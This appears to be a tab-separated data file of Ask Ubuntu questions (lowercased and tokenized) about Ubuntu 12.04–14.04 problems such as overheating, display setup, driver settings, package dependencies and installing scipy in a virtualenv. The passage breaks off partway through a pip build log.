496408	hp probook 4530s running on ubuntu 14.04 overheats and lags	i 've dual operating system in my laptop ( hp probook 4530s ) . windows 7 with ubuntu 14.04 . windows runs normal but the machine overheats when running ununtu . lshw command spits out a lot of information and i am confused looking at it . what are the possible causes of the overheating and laggy performance of ubuntu in my laptop . and how can i solve this ?
496409	two monitors , two dp-connectors , ubuntu sees those as one	i have a ibm thinkpad in a dockingstation . attached are two monitors ( default resolution : 1920x1200 ) via two displayport connectors . the laptop have nvidia/intel chipset , but i only using intel . nouveau did not work , and the nvidia driver did work , but was really buggy . with the intel-driver , almost everything works , except for the following problem : ubuntu sees only one displayport and one monitor , but uses both . before any configuration , i get the same picture ( 1920x1200 ) on both monitors . it 's a mirror display , however , ubuntu says it 's only seeing one monitor with that resolution . ( ubuntu are unaware of the mirroring ) but , i can choose a resolution of 3840x1200 , which give me one big desktop spanning both monitors . but the problem is that the middle of the screen is right between the desktops . maximizing a window is also spanning across both monitors . is there a way to split the one monitor/screen ubuntu believe is there , into two equal monitors ? btw , here is the output of xrandr : $ xrandr screen 0 : minimum 320 x 200 , current 3840 x 1200 , maximum 32767 x 32767 edp2 connected ( normal left inverted right x axis y axis ) 2880x1620 60.0 + 50.0 2048x1536 60.0 1920x1440 60.0 1856x1392 60.0 1792x1344 60.0 1920x1200 60.0 1920x1080 59.9 1600x1200 60.0 1680x1050 60.0 59.9 1600x1024 60.2 1400x1050 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp2 connected primary 3840x1200+0+0 ( normal left inverted right x axis y axis ) 519mm x 324mm 1920x1200 60.0 + 3840x1200 60.0* 2560x1024 60.0 1600x1200 60.0 1680x1050 60.0 1280x1024 60.0 1280x960 60.0 1024x768 60.0 800x600 60.3 640x480 60.0 59.9 720x400 70.1 hdmi2 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) edp-1-1 disconnected dvi-d-1-1 disconnected i am running ubuntu 14.04 lts ( x86_64 )
496412	access harddisk from ubuntu customization kit-prompt	how do i access my hard disk from the ubuntu customization kit-prompt ? the mounted file system is the live cd 's own system . i want to use it for installation of deb-packages stored at the local hard disk .
496415	nvidia gpu fan speed setting not staying permanent	running a nvidia 660ti and ubuntu 14.04 with nvidia driver 331.38 from the stock additional drivers repo . this also effects my 12.04.4 box running the 319.76 proprietary driver from nvidia as well . followed this post by waspinator to get coolbits to work because coolbits 5 did nothing . i can control the fan speed but the settings never stick . after a reboot the fan settings are at 34 % . i have to tick the 'enable gpu fan settings ' and click yes to the eula on ever boot . anyone know how to make the settings permanent ? things i tried : sudo nvidia-settings does nothing sudo nvidia-settings -a `` [ gpu:0 ] /gpufancontrolstate=1 '' this setting ticks the 'enable gpu fan settings ' if coolbits is active but again it wo n't stick after a reboot . added [ gpu:0 ] /gpufancontrolstate=1 to the ~/.nvidia-settings-rc agian wont stick after a reboot . update : ok i made the ~/.nvidia-settings-rc file read only and it stuck . it 's not ideal but is does stick after a reboot .
496417	youtube-dl not working	i get the following error when i try to download video using youtube-dl . warning : warning : falling back to static signature algorithm error : unable to download video data : http error 403 : forbidden
496418	no internet connection while installing ubuntu 12.04	currently i am running windows 7 on my pc . when i boot to windows , it connects to the internet . but when i try to install ubuntu 12.04 and boot from the flash it shows disconnected - you are now offline . i am using wireless internet , and i also tried connecting directly from my router to my pc too , still i can not connect to the internet . anyone has an idea how fix this very annoying problem ? the output of ifconfig is as bellow : eth0 link encap : ethernet hwaddr 62 : d5:10:5d:82:31 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:16 errors:0 dropped:0 overruns:0 frame:0 tx packets:16 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1312 ( 1.3 kb ) tx bytes:1312 ( 1.3 kb )
496419	how do i write accents & foreign characters within chrome ?	i 'm using google chrome as my default browser in ubuntu 14.04 . everything was working fine but after a chrome update i stoped being able to write accents with my keyboard - for example i 'm unable to write á instead if i press `` ´ '' before pressing `` a '' i get nothing neither `` a '' or `` á '' . this does n't happen anywere else . it works just fine on firefox and every other program . i 'm using chrome version 35.0.1916.153 and ubuntu 14.04 lts . how to solve it ?
496420	getting started to ubuntu	i had just downloaded ubuntu 12 now i and also installed but i do n't know how to use it . i want to host a complete website ( online i.e. , viewable in public ) working website with php and mysql . please suggest me what to do .
496422	unity come back to default	i did some changes via compiz , the result was this : as you see just time color is default and other like wireless and volume 's color are dark . what is the terminal command to tell unity , come back to your default ?
496424	kvm guest network problems	i had a server running kvm that was upgraded from ubuntu 13.10 to 14.04 and since the upgrade after a couple of hours ( in some cases less ) the guest machines ( a mix of linux and windows , using both virtio , realtek and intel as network interfaces ) , start to have network problems . pinging them shows that now and then the ping goes from a couple of miliseconds to several seconds . also when connected to the guest using virt-manager when the ping goes through the roof the guest connection also freezes , although pinging the host never goes over 10ms . i already tried several things : change network interface type ( virtio , etc ) , pinning vcpus , adding < driver name='qemu'/ > to the guests ' config , disable and reenable the guest network and even upgrading the packages using this ppa : ubuntu-virt/virt-daily-upstream , but only rebooting the guest temporally solves this . any ideas ? i am considering going back to 13.10 .
496425	problem cause with libxml2 after upgrade from 12.04 to 14.04	after upgrade 12.04 64bit lts to ubuntu 14.04 64bit lts have problems with libxml2 . ca n't run software center , empathy etc # software-center traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 128 , in < module > from softwarecenter.ui.gtk3.app import softwarecenterappgtk3 file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 106 , in < module > from softwarecenter.ui.gtk3.panes.installedpane import installedpane file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/installedpane.py '' , line 34 , in < module > from softwarecenter.db.categories import ( categoriesparser , file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 30 , in < module > import lxml.etree as et importerror : /usr/local/lib/libxml2.so.2 : version `libxml2_2.9.0 ' not found ( required by /usr/lib/python2.7/dist-packages/lxml/etree.so ) or # empathy empathy : /usr/local/lib/libxml2.so.2 : version `libxml2_2.9.0 ' not found ( required by /usr/lib/x86_64-linux-gnu/libxslt.so.1 ) did # locate libxml2.so /opt/openoffice4/program/libxml2.so.2 /usr/lib/i386-linux-gnu/libxml2.so.2 /usr/lib/i386-linux-gnu/libxml2.so.2.9.1 /usr/lib/vmware-installer/2.1.0/lib/lib/libxml2.so.2 /usr/lib/vmware-installer/2.1.0/lib/lib/libxml2.so.2/libxml2.so.2 /usr/lib/vmware-vmrc/5.1/lib/libxml2.so.2 /usr/lib/vmware-vmrc/5.1/lib/libxml2.so.2/libxml2.so.2 /usr/lib/x86_64-linux-gnu/libxml2.so /usr/lib/x86_64-linux-gnu/libxml2.so.2 /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.1 /usr/local/lib/libxml2.so /usr/local/lib/libxml2.so.2 /usr/local/lib/libxml2.so.2.8.0 or # sudo dpkg -- list | grep libxml2 ii libxml-libxml-perl 2.0108+dfsg-1 ii libxml2 : amd64 2.9.1+dfsg1-3ubuntu4.3 ii libxml2 : i386 2.9.1+dfsg1-3ubuntu4.3 ii libxml2-dev : amd64 2.9.1+dfsg1-3ubuntu4.3 ii python-libxml2 2.9.1+dfsg1-3ubuntu4.3 ii python-lxml 3.3.3-1ubuntu0.1 ii python3-lxml 3.3.3-1ubuntu0.1 or sudo apt-get install -- reinstall libxml-libxml-perl warning : program compiled against libxml 209 using older 208 warning : xml : :libxml compiled against libxml2 20901 , but runtime libxml2 is older 20800 update-perl-sax-parsers : registering perl sax parser xml : :libxml : :sax with priority 50 ... warning : program compiled against libxml 209 using older 208 warning : xml : :libxml compiled against libxml2 20901 , but runtime libxml2 is older 20800 update-perl-sax-parsers : updating overall perl sax parser modules info file ... replacing config file /etc/perl/xml/sax/parserdetails.ini with new version
496426	how do i downgrade php5.5.3 to 5.4 ?	i am trying to downgrade php from 5.5.3 to 5.4 . i tried to find a 5.4 version using aptitude versions php5-common package php5-common : p a 5.5.3+dfsg-1ubuntu2 saucy 500 i a 5.5.3+dfsg-1ubuntu2.6 saucy-security , saucy-upda 500 package php5-common : i386 : p 5.5.3+dfsg-1ubuntu2 saucy 500 p 5.5.3+dfsg-1ubuntu2.6 saucy-security , saucy-upda 500 how do downgrade to version 5.4 ?
496432	gzip all files with specific extensions	i 'm trying to gzip all files on ubuntu that have the file extension .css , .html or .js . in a top directory and all subdirectories . i want to keep the original files and overwrite the .gz file , if already existing . so when i have n files , i want to keep these n files and create additional n archive files . not just one . my try was to run a script that looks like this : gzip -rkf *.css gzip -rkf *.html ... one line for each file extension first : i need to have one line in that script for each file extension i want to gzip . that 's ok , but i hope to find a better way second and more important : it does not work . although -r should do the job , the subdirectories are unchanged . the gzip file is only created in the top directory . what am i missing here ? btw : the following is a bug in the verbose output , right ? when using -k and -v option -k , -- keep keep ( do n't delete ) input files -v , -- verbose verbose mode the verbose output says it replaces the file , although `` replace '' means that the original file does not exist after the replace . anyway , this is only the output thing . $ ls index.html subdir1 testfile testfile.css.gz javaclass.java subdir2 testfile.css $ gzip -fkv *.css testfile.css : 6.6 % -- replaced with testfile.css.gz $ ls index.html subdir1 testfile testfile.css.gz javaclass.java subdir2 testfile.css
496442	not understanding /var/www permissions	i know similar questions have been asked , but i could n't find a solution because i 'm not looking for a command to give new rights to the directory , i would like to understand it . i 'm very new to ubuntu , have installed the server and apache2 ( not lamp , or at least not aware of it ) . i access the server by sftp . i would like to move my existing website to the /var/www directory , but of course by default i do n't have permission to copy files and folders . i 'm not looking for a code , but can somebody explain to a beginner : what is the way to go in such a case ? i have trouble to believe that the first thing i have to do is to lower the permissions . thanks
496443	i just down loaded opera browser why is it no longer pinned to my menu the next day ?	i just down loaded opera browser yesterday . it worked all day but then today there is no longer a icon pinned to the menu ? where did it go ? how can i get it back ?
496445	is it possible to retrieve the data by using recuva software	while installing ubuntu , i have lost all the data , which i had stored in my d drive , when i was using windows 7 . is it possible to retrieve the data by using recuva software . thanks .
496448	quicktime crashing after a few seconds	i want to be able to watch the european parliament on ubuntu . i 'm using quicktime player , but it only works for a few seconds before crashing . here is a link to what i want to watch : http : //www.europarl.europa.eu/sides/getvod.do ? mode=chapter & language=en & voddateid=20140702-09:16:16-789
496451	execute a statement /bin/bash seems not to work in virtualbox client	i do not know if askubuntu is the correct place to ask or stack overflow . to execute a statement in windows use : c : \\windows\\system32\\cmd.exe what is the equivalent in ubuntu ? i thought it was : /bin/bash but that does not work for me . i tried /bin/sh and /bin/dash ( like shown here ) but without result . in virtualbox client i want to be able to execute a statement . for this i use pyvbox which is a python shell for the virtualbox api . after installing execute in statement in virtualbox windows client is possible with the statement : process , stdout , stderr = gs.execute ( 'c : \\windows\\system32\\cmd.exe ' , [ '/c ' , 'tasklist ' ] ) see this link i want to something like this for vbox ubuntu client with the statement : process , stdout , stderr = gs.execute ( '/bin/bash ' , [ 'echo hello world ' ] ) which returns no output . in vbox ubuntu client statement : which bash returns : /bin/bash and echo hello world is executed well . which alternatives there might be to execute a statement in ubuntu ? sorry if this is not the correct place to ask .
496455	ca n't upgrade ubuntu 12.04 to 14.04 ( package dependencies can not be resolved )	this is what i get each time i try to upgrade : '' the following packages have unmet dependencies : libgl1-mesa-glx-lts-trusty : depends : libglapi-mesa-lts-trusty ( = 10.1.3-0ubuntu0.1~precise1 ) but 10.1.3-0ubuntu0.1~precise1 is to be installed depends : libx11-6 ( > = 2:1.4.99.1 ) but 2:1.4.99.1-0ubuntu2.2 is to be installed depends : libxdamage1 ( > = 1:1.1 ) but 1:1.1.3-2build1 is to be installed xserver-xorg-lts-trusty : depends : xserver-xorg-core-lts-trusty ( > = 2:1.11 ) but 2:1.15.1-0ubuntu2~precise1 is to be installed '' how can i workaround this problem ?
496457	how to add users in filezilla for specific folders ?	today i have a question for filezilla in ubuntu . how can i add a filezilla 's user ( with different passwords ) with ssh access , for a specific folder ? examples : the user `` admin '' , with the password `` qidkgr '' , can access only to the directory `` /root/ '' the user `` webmaster '' , with the password `` dkaopd '' , can access only to the directory `` /root/web/ '' the user `` developer '' , with the password `` ptofla32 '' , can access only to the directory `` /root/c++/ '' anyone can help me ? thanks !
496458	problem with the installation on ubuntu 14.04 lts	i had a computer running windows7 and wanted to change to ubuntu . so i installed the 14.04 lts version and all seemed to have gone cool . ( i 'd like to make clear that i want just ubuntu in the computer , not a dual boot with windows ) . finished installation and system asked to reboot to start from hard drive ( installation made via a live cd ) . the problem comes when i see that no grub is loaded , laptop does n't do anything just ask whether to boot from hard drive or cd , if you press hdd does n't load anything , just asks the same . it seems that i have a problem in the boot partition ? when i load the live cd and get to the terminal , i type fdisk -l to see my partitions and this is the answer i get : '' warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . '' tried to install grub from terminal but this answer appears : '' grub-install : error : failed to get canonical path of `/cow ' . '' i have 4 partitions , boot , home , root and swap . which has to be the format of the boot ? efi , ext2 , fat ... ? has anything to do with the previous windows installation and thus , some conflict with the master boot record and the format that windows 7 uses ? so i have no idea how to solve this . could you please help me with it ?
496459	how to install ubuntu server ?	i got the ubuntu server here , but it downloaded as an iso file , which after opening , i had no idea what to do with . there were no .exe or .msi files in the disk . i did a google search , but some results said that a language selection should automatically appear , and some said i had to burn the iso file , but i do n't have a disk slot on my pc ( running windows 8 ) . does anybody know how this works ?
496461	how to install android studio ?	i have used the following command to install android studio to ubuntu : sudo apt-get install android-studio however , the following message appears : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . what is the problem and how to solve it ?
496467	how to apply newly installed theme in 14.04 ?	i 've installed human-theme_0.39.2_all.deb but it does n't seem in appearance just default themes are there . how i can apply ?
496469	seem some themes in usr/share/themes on ubuntu 14.04 lts	so many themes are in usr/share/themes .but in appearance only three default themes are there how i can apply from usr/share/themes ?
496473	what is the best way to build a package that targets a single ubuntu release only ?	at the moment i build and package our software for ubuntu 14.04 aka 'trusty ' via dpkg-buildpackage . i get a .deb package that can be installed on ubuntu 14.04 but also on other ubuntu releases e.g . 12.04 aka 'precise ' . this is dangerous as the software can be installed without error message but the program is unable to run/work correctly . dependencies of my package are given in the control file . however this file does not let me enter a distribution/codename of ubuntu . the distribution may be entered as part of the *.changes but this is not reflected anywhere in the .deb file . checking the complex dependency situation during the post-install script is complex too . thus i want an easy way to prevent an installation of an ubuntu package on the wrong ubuntu release . what is the best way to build a package that targets a single ubuntu release only ? in the best case ( 1 ) the installation should only work on the targeted ubuntu release and ( 2 ) the .deb package contains the distribution name* , e.g . like package_1.0.0-3_trusty_amd64.deb . ( * ) otherwise the apt repository managed via repreprocannot have two packages with the same version number , each targeting a different ubuntur release . thanks in advance . update : the debian/control file of my package : source : mypackage priority : extra build-depends : debhelper ( > = 9 ) , python ( > =2.7 ) , pyside-tools x-python-version : > = 2.7 standards-version : 3.9.2 package : mypackage architecture : amd64 depends : ros-indigo-desktop-full|ros-hydro-desktop-full , ros-indigo-rqt|ros-hydro-rqt , ros-indigo-gps-umd|ros-hydro-gps-umd , ros-indigo-map-server|ros-hydro-map-server , imagemagick , octave ( > = 3.6 ) , libdc1394-22 , sox , tree , python ( > =2.7 ) , python-psutil , python-usb , python-serial , python-gi , gir1.2-gexiv2-0.10|gir1.2-gexiv2-0.4 , exfat-fuse|fuse-exfat , exfat-utils , gphotofs , python-pyproj , libusb-1.0-0 ( > =2:1.0.17 ) , libpyside1.2|libpyside1.1 ( > =1.1.2 ) , $ { shlibs : depends } , $ { misc : depends } description : ... as one can see this control file was adapted such that we can run the build on multiple ubuntu releases where the dependencies have different version numbers : libpyside1.2|libpyside1.1 ( > =1.1.2 ) . is there a better way to handle this ?
496474	adding items to gnome-fallback menu ( 13.10 )	i want to add new items to the applications menu in gnome-session-fallback : i open the edit with alt-rt-click , select the submenu where i want the new item . and add the details to the dialogue box . unfortunately , it puts the new item in `` other '' which is not where i want it . there is no cut-and-paste facility to move the item . it is stuck where i do n't want it ! is there a way to sort this out ? most of the items in `` other '' really ought to be under a more useful heading anyway .
496475	only one video card available on dell vostro 3550	i got used dell vostro 3550 . specs says it have two graphic cards : amd ati mobility radeon hd 7450m/7650m intel速 hd graphics 3000 but ubuntu 14.04 lts only see intel ( i tested 12.04 lts and same results ) . preinstalled win7 also saw only intel before being erased . what 's going on ? i suppose ati card ca n't be unplugged . also in bios there is nothing about video cards . some testing : filip @ b17 : ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) filip @ b17 : ~ $
496478	how to use zoneminder on 14.04 ?	i 've installed the zoneminder package ( had to start mysql , otherwise it ca n't even install ) . i 've also started apache after that . but i ca n't find how to actually get to the web interface . localhost/zm gets me to one of my drupal installations .
496483	installing ubuntu 14.04 returns a black screen with cursor dell inspiron 15	before anything , i 've tried a lot of the solutions that were asked in ask ubuntu , but none of them seems to be working for me . i 've disabled the secure boot and boot list option set it to legacy so i can boot from the usb drive . after that i get the loading screen ? of the installer , i pressed shift and get the option to choose a language , i choose english , and it gives me a menu with the following : try ubuntu without installing install ubuntu check disc for defects test memory boot from first hard disk i 've tried the first 2 options but when ever i try them i am returned with a black screen with a blinking cursor that does nothing . i 've tried pressing f6 and pressing enter on the 'nomodeset ' and try the first 2 options again in the menu , but returning the same result . also when i press f6 a command line ? appears above the 'f1-f6 ' options below and at the end it says 'quiet splash ' , i 've tried changing that to 'nomodeset ' also and still get the same result . any help please ? i downloaded ubuntu 14.04 lts from the official ubuntu website . my laptop 's specifications : intel core i3-3227u 1.90ghz cpu 6gb ram intel hd graphics 4000 edit : i 've tried to install this too in my dell optiplex 790 desktop but same result .
496485	server upgrade an 'end-of-life ' server from iso over ssh	i have read that it is possible to upgrade ubuntu from an iso image , but would the same be possible from a remote location over ssh ? after mounting the iso , what command would i use to upgrade ? i ask because i have a server 11.04 in my brother 's home and he lives in holland and i live in east africa and 11.04 is no longer supported so do-release-upgrade does n't work anymore .
496486	how to install sqlite sqlite 3.7.11 on ubuntu 12.04	according to this question , to get code my code work on this 12.04 machine i need to upgrade the version of sqlite to 3.7.11 . however , on ubuntu 12.04 the installed version of sqlite is > sqlite3 -- version 3.7.9 2011-11-01 00:52:41 c7c6050ef060877ebe77b41d959e9df13f8c9b5e how do i upgrade sqlite ( i 'm stuck using 12.04 ) ? if the answer is , `` use this magic ppa '' , please tell me how you found it - i tried searching and left empty-handed .
496487	can a ppa repository belong to main ?	software repositories in ubuntu are divided into four categories or components - main , restricted , universe and multiverse , according to support offered by ubuntu and free and open source : how well it meets the goals of ubuntu 's free software philosophy . in my source file , i saw that all the ppa 's belong to main , e.g . : deb http : //ppa.launchpad.net/kalakris/okular/ubuntu precise main deb-src http : //ppa.launchpad.net/kalakris/okular/ubuntu precise main while both being free and open source , main is officially supported by the ubuntu security and distribution team . and universe is community maintained , but not officially supported . should n't a ppa belong to universe instead of main ?
496488	install scipy at virtualenv	i asked a question a few days back , on how to run an older version of matplotlib and i got an amazing answer back . what i had to do was to execute these commands : mkdir matplotlib_1.1.1 cd matplotlib_1.1.1 virtualenv env env/bin/pip install numpy env/bin/pip install https : //pypi.python.org/packages/source/m/matplotlib/matplotlib-1.1.1.tar.gz and then execute : source env/bin/activate i have executed the aformentioned commands . however , in order to run my python program i also need to install at the virtualenv the scipy as well . when trying to run env/bin/pip install scipy i get the following errors : env/bin/pip run on fri jul 11 15:25:09 2014 downloading/unpacking scipy getting page https : //pypi.python.org/simple/scipy/ urls to search for versions for scipy : * https : //pypi.python.org/simple/scipy/ analyzing links from page https : //pypi.python.org/simple/scipy/ skipping https : //pypi.python.org/packages/2.7/s/scipy/scipy-0.13.3-cp27-none-macosx_10_6_intel.whl # md5=4bc791c9f37645380cab2843e63d18db ( from https : //pypi.python.org/simple/scipy/ ) because it is not compatible with this python skipping https : //pypi.python.org/packages/3.3/s/scipy/scipy-0.13.3-cp33-cp33m-macosx_10_6_intel.whl # md5=ca634955b1757fe5e22c6a8a035bb328 ( from https : //pypi.python.org/simple/scipy/ ) because it is not compatible with this python skipping https : //pypi.python.org/packages/3.4/s/scipy/scipy-0.13.3-cp34-cp34m-macosx_10_6_intel.whl # md5=0042a2e09d1632b47ed4fdb411cf9821 ( from https : //pypi.python.org/simple/scipy/ ) because it is not compatible with this python skipping https : //pypi.python.org/packages/cp27/s/scipy/scipy-0.14.0-cp27-none-macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64.whl # md5=d3728a6d43c3265003db3781cbd4660f ( from https : //pypi.python.org/simple/scipy/ ) because it is not compatible with this python skipping https : //pypi.python.org/packages/cp33/s/scipy/scipy-0.14.0-cp33-cp33m-macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64.whl # md5=0ff3c20cb8e9c5c38e5a18cda3178ca7 ( from https : //pypi.python.org/simple/scipy/ ) because it is not compatible with this python skipping https : //pypi.python.org/packages/cp34/s/scipy/scipy-0.14.0-cp34-cp34m-macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64.whl # md5=de679794f46812c784845835371539f4 ( from https : //pypi.python.org/simple/scipy/ ) because it is not compatible with this python found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.10.0.tar.gz # md5=e357c08425fd031dce63bc4905789088 ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.10.0 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.10.0.zip # md5=d1a4242266739433dcfe2096b0ab4007 ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.10.0 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.10.1.tar.gz # md5=6ad976549e22e04ca93e70cf55b70a22 ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.10.1 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.10.1.zip # md5=4156cc1b765eb186de9518a94b6c3518 ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.10.1 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.11.0.tar.gz # md5=842c81d35fd63579c41a8ca21a2419b9 ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.11.0 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.11.0.zip # md5=40b700ddde9ddab643b640fff7a9d753 ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.11.0 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.12.0.tar.gz # md5=8fb4da324649f655e8557ea92b998786 ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.12.0 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.12.0.zip # md5=e4b9f3cb2e965fc8751faedfb9164d08 ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.12.0 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.12.1.tar.gz # md5=906278290152fedfe79029371ca584a5 ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.12.1 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.12.1.zip # md5=3f23065fc45152c92c3588dad2f20c62 ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.12.1 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.13.0.tar.gz # md5=ffa1e9bfd2bbdf3f17f4cf8139084098 ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.13.0 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.13.0.zip # md5=bd588ce8255e4d5427b5b19e9da2d4c7 ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.13.0 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.13.1.tar.gz # md5=e082fe358a2b39cff235e5af4240f5a5 ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.13.1 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.13.1.zip # md5=485411032b02583b4eb63caec6f2a916 ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.13.1 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.13.2.tar.gz # md5=fcd110802b0bf3505ba567cf831566e1 ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.13.2 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.13.2.zip # md5=9befa30e546fba762a0c1695a509f731 ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.13.2 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.13.3.tar.gz # md5=0547c1f8e8afad4009cc9b5ef17a2d4d ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.13.3 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.13.3.zip # md5=20ff3a867cc5925ef1d654aed2ff7e88 ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.13.3 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.14.0.tar.gz # md5=d7c7f4ccf8b07b08d6fe49d5cd51f85d ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.14.0 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.14.0.zip # md5=7ee4fa9e756bab6b46b79f77c821cb68 ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.14.0 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.8.0.tar.gz # md5=f0bfc6141b90e6a31555b31486602251 ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.8.0 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.9.0.tar.gz # md5=ebfef6e8e82d15c875a4ee6a46d4e1cd ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.9.0 found link https : //pypi.python.org/packages/source/s/scipy/scipy-0.9.0.zip # md5=a37933c9e3c4fdf8d087624cd7dcb47d ( from https : //pypi.python.org/simple/scipy/ ) , version : 0.9.0 using version 0.14.0 ( newest of versions : 0.14.0 , 0.14.0 , 0.13.3 , 0.13.3 , 0.13.2 , 0.13.2 , 0.13.1 , 0.13.1 , 0.13.0 , 0.13.0 , 0.12.1 , 0.12.1 , 0.12.0 , 0.12.0 , 0.11.0 , 0.11.0 , 0.10.1 , 0.10.1 , 0.10.0 , 0.10.0 , 0.9.0 , 0.9.0 , 0.8.0 ) downloading from url https : //pypi.python.org/packages/source/s/scipy/scipy-0.14.0.tar.gz # md5=d7c7f4ccf8b07b08d6fe49d5cd51f85d ( from https : //pypi.python.org/simple/scipy/ ) running setup.py ( path : /home/user/dropbox/thesis/matplotlib_1.1.1/env/build/scipy/setup.py ) egg_info for package scipy running egg_info creating pip-egg-info/scipy.egg-info writing dependency_links to pip-egg-info/scipy.egg-info/dependency_links.txt writing pip-egg-info/scipy.egg-info/pkg-info writing top-level names to pip-egg-info/scipy.egg-info/top_level.txt writing manifest file 'pip-egg-info/scipy.egg-info/sources.txt' warning : manifest_maker : standard file '-c ' not found reading manifest file 'pip-egg-info/scipy.egg-info/sources.txt' reading manifest template 'manifest.in' warning : no previously-included files matching '*_subr_*.f ' found under directory 'scipy/linalg/src/id_dist/src' no previously-included directories found matching 'scipy/special/tests/data/boost' no previously-included directories found matching 'scipy/special/tests/data/gsl' no previously-included directories found matching 'doc/build' no previously-included directories found matching 'doc/source/generated' no previously-included directories found matching '*/__pycache__' warning : no previously-included files matching '*~ ' found anywhere in distribution warning : no previously-included files matching '*.bak ' found anywhere in distribution warning : no previously-included files matching '*.swp ' found anywhere in distribution warning : no previously-included files matching '*.pyo ' found anywhere in distribution writing manifest file 'pip-egg-info/scipy.egg-info/sources.txt' source in ./env/build/scipy has version 0.14.0 , which satisfies requirement scipy installing collected packages : scipy running setup.py install for scipy running command /home/user/dropbox/thesis/matplotlib_1.1.1/env/bin/python -c `` import setuptools , tokenize ; __file__='/home/user/dropbox/thesis/matplotlib_1.1.1/env/build/scipy/setup.py ' ; exec ( compile ( getattr ( tokenize , 'open ' , open ) ( __file__ ) .read ( ) .replace ( '\r\n ' , '\n ' ) , __file__ , 'exec ' ) ) '' install -- record /tmp/pip-uso4f_-record/install-record.txt -- single-version-externally-managed -- compile -- install-headers /home/user/dropbox/thesis/matplotlib_1.1.1/env/include/site/python2.7 blas_opt_info : blas_mkl_info : libraries mkl , vml , guide not found in [ '/home/user/dropbox/thesis/matplotlib_1.1.1/env/lib ' , '/usr/local/lib ' , '/usr/lib ' , '/usr/lib/x86_64-linux-gnu ' ] not available openblas_info : libraries not found in [ '/home/user/dropbox/thesis/matplotlib_1.1.1/env/lib ' , '/usr/local/lib ' , '/usr/lib ' , '/usr/lib/x86_64-linux-gnu ' ] not available atlas_blas_threads_info : setting ptatlas=atlas libraries ptf77blas , ptcblas , atlas not found in [ '/home/user/dropbox/thesis/matplotlib_1.1.1/env/lib ' , '/usr/local/lib ' , '/usr/lib ' , '/usr/lib/x86_64-linux-gnu ' ] not available atlas_blas_info : libraries f77blas , cblas , atlas not found in [ '/home/user/dropbox/thesis/matplotlib_1.1.1/env/lib ' , '/usr/local/lib ' , '/usr/lib ' , '/usr/lib/x86_64-linux-gnu ' ] not available /home/user/dropbox/thesis/matplotlib_1.1.1/env/local/lib/python2.7/site-packages/numpy/distutils/system_info.py:1521 : userwarning : atlas ( http : //math-atlas.sourceforge.net/ ) libraries not found . directories to search for the libraries can be specified in the numpy/distutils/site.cfg file ( section [ atlas ] ) or by setting the atlas environment variable . warnings.warn ( atlasnotfounderror.__doc__ ) blas_info : libraries blas not found in [ 